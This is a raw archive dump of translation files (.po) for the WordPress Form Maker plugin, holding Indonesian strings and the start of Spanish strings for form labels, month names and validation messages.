AprilRetningsnummerAugustCentByLandDesemberDollarFeil, ble e-posten ikke sendt.Feil, kan filen ikke flyttes.Feil, feil sikkerhetskode.FebruarFørsteFragå JanuarJuliJuniSisteMarsMai(Midtre)Ingenting ble sendt.NovemberOktoberTelefonnummerPostal / postnummerKvantitetTilbakestill Velg en datoVelg et felt SeptemberBeklager, du har ikke lov til å laste opp denne filtypen.Stat / provins / regionGateadresseGateadresse Linje 2DenFilen overskrider den tillatte størrelsen påDette feltet %s krever en unik og denne verdien var allerede sendt.Dette er ikke en gyldig e-postadresse.TittelÅAdresse verifisering er ugyldig.Du kan ikke velge tidligere datoer. Velg en dato fra den nåværende.Din e-postadresse er allerede bekreftet.Din e-post har blitt bekreftet.Din e-postbekreftelse er utløpt.Din skjema ble sendt inn.Din IP er svartelistet. Ta kontakt med nettstedet administratorPoengsummen din bør være mindre enn Feltet er påkrevd.Verdien må være mellom languages/form_maker-id_ID.po000060400000056656152434416630012170 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:58+0400\n"
"PO-Revision-Date: 2015-05-22 16:58+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: id\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Street Address"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Street Address Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Kota"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Negara / Provinsi / Wilayah"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Pos / Kode Pos"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Negara"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Januari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Maret"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mei"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Juni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juli"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Agustus"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Desember"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Kesalahan, kode keamanan yang salah."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Ip Anda daftar hitam. Silahkan hubungi administrator website. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "File melebihi ukuran yang diizinkan"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Maaf, Anda tidak diperbolehkan untuk meng-upload file jenis ini."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Error, file tidak dapat dipindahkan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Bidang %s memerlukan entri yang unik dan nilai ini sudah diajukan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Kesalahan, email tidak dikirim."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Tidak ada yang diajukan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Bentuk kamu telah diserahkan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Kesalahan, email tidak dikirim."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Alamat email Anda sudah diverifikasi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Email Anda telah berhasil diverifikasi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Email verifikasi Anda telah habis waktunya."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Link verifikasi tidak valid."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "bidang yang diperlukan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Ini bukan alamat email yang valid."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Anda tidak dapat memilih mantan tanggal. Pilih tanggal mulai dari yang "
"sekarang."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "itu "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Nilai harus antara "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Kuantitas "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Skor Anda harus kurang dari "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Title"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Pertama"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Terakhir"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Tengah"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Kode wilayah"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Nomor telepon"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolar. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "cents "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "dari "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "untuk"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "pergi "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Atur ulang"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Pilih Field "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Pilih Tanggal"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-es_ES.po000060400000057204152434416630012204 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:53+0400\n"
"PO-Revision-Date: 2015-05-22 16:54+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: es\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Dirección (Calle y Número)"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Calle Dirección 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "CIUDAD"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Estado / Provincia / Región"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Código postal"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "País"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Enero"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "febrero"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marzo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "abril"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
